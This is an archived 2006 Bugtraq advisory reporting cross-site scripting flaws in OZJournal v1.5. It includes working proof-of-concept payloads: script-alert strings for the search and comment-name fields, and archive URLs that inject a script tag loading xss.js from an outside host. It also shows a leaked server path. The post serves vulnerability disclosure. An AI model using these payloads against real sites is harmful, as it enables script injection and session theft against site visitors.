lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060802174247.16441.qmail@securityfocus.com>
Date: 2 Aug 2006 17:42:47 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: OZJournal v1.5 - XSS

OZJournal v1.5

Homepage:
http://ozjournals.awardspace.com/index.php

Affected files:
search input box
index.php
viewing archives
show comment page
----------------------------------------

XSS vulnerability via search input box:

Data isn't properly sanatized before being displayed. For a PoC in the search input box put: <script>alert('Hello')</script>. A full path disclosure error also will occur with this example due to functions.php.

Warning: preg_match(): Unknown modifier 'c' in /home/www/site/functions.php on line 570

--------------------------------

XSS vuln viewing archives by month via m variable.

PoC:

http://example.com/index.php?show=archives&y=2006&m=<script%20src=http://www.youfucktard.com/xss.js></script>

XSS vuln viewing archives by category via c variable:

http://example.com/index.php?show=archives&c=http://ozjournals.awardspace.com/index.php?show=archives&c=<script%20src=http://www.youfucktard.com/xss.js></script>
-------------------------------------

XSS vuln after submitting a comment.

Data in the input name box isn't sanatized on the show post comments screen after submitting a comment. 

However, when displaying comments in the journal everything is properly sanatized and filtered. For a PoC 

in the name input box put: 

<script>alert('Hello')</script>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ